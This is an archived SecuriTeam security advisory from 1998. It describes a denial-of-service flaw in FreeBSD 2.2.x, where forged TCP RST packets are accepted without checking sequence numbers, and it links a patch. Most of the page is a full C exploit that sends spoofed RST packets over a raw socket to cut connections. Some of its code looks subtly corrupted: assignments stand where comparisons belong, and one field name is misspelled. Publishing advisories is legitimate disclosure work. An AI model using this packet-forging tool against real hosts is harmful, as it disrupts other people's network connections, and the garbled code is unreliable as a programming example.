Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	FreeBSD 2.2.x (before 2.2.8R) can be attacked by a RST Denial of Service. 19 Oct. 1998    Summary FreeBSD 2.2.x (unpatched version) was found to be vulnerable to a RST attack. This is due to FreeBSD's lack of checking the of the sequence numbers in the RST packet. A malicious user can terminate any connection between the FreeBSD server and a remote user.   Credit: FreeBSD's home page is: http://www.freebsd.org. A patch for this problem can be found at: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:07/ Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner FreeBSD 2.2.x unfortunately doesn't check to see if the RST packet that it receives is a valid RST packet, this means that it only checks to see whether the IP address and the IP port pairs match to an existing connection, without checking the packet's sequence number. Because minimal information is needed, the system which is most vulnerable, are multi-usered systems, where users can run any of the following program: lsof, netstat, and systat -net (or similar), because they show the needed pairs for the attack. The needed pair can be found also by trying to connect to the remote server, and checking for the returning port number (which is of course the "highest" port number used), and by this finding out that each port under this number can be used for an attack. A BSD exploit code is attached below: /* rst.c -- based on: land.c by m3lt, FLC crashes a win95 box Ported by blast and jerm to 44BSD*/ #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <ctype.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> #include <errno.h> /* #include <netinet/ip_tcp.h> */ /* #include <netinet/protocols.h> */ struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)=1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in src, dst; struct hostent * hoste; int sock,foo; char buffer[40]; struct ip * ipheader=(struct ip *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip)); struct pseudohdr pseudoheader; fprintf(stderr,"rst.c (based on BSD port of land by m3lt & blast of FLC)\n"); if(argc<5) { fprintf(stderr,"usage: %s srcaddr srcport dstaddr dstport\n",argv[0]); return(-1); } bzero(&src,sizeof(struct sockaddr_in)); bzero(&dst,sizeof(struct sockaddr_in)); src.sin_family=AF_INET; dst.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&src.sin_addr,hoste->h_length); else if((src.sin_addr.s_addr=inet_addr(argv[1]))=-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((src.sin_port=htons(atoi(argv[2])))=0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((hoste=gethostbyname(argv[3]))!=NULL) bcopy(hoste->h_addr,&dst.sin_addr,hoste->h_length); else if((dst.sin_addr.s_addr=inet_addr(argv[3]))=-1) { fprintf(stderr,"unknown host %s\n",argv[3]); return(-1); } if((dst.sin_port=htons(atoi(argv[4])))=0) { fprintf(stderr,"unknown port %s\n",argv[4]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))=-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } foo=1; if(setsockopt(sock,0,IP_HDRINCL,&foo,sizeof(int))=-1) { fprintf(stderr,"couldn't set raw header on socket\n"); return(-1); } bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr)); ipheader->ip_v=4; ipheader->ip_hl=sizeof(struct ip)/4; ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr); ipheader->ip_id=htons(0xF1C); ipheader->ip_ttl=255; ipheader->ip_p=IPPROTO_TCP; ipheader->ip_src=src.sin_addr; ipheader->ip_dst=dst.sin_addr; tcpheader->th_spozt=src.sin_port; tcpheader->th_dport=dst.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_RST; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr=src.sin_addr; pseudoheader.daddr=dst.sin_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &dst,sizeof(struct sockaddr_in))=-1) { fprintf(stderr,"couldn't send packet,%d\n",errno); return(-1); } fprintf(stderr,"%s:%s -> %s:%s reset\n",argv[1],argv[2],argv[3],argv[4]); close(sock); return(0); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles RealNetworks RealPlayer Malformed AAC File Parsing Code Execution Vulnerability ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®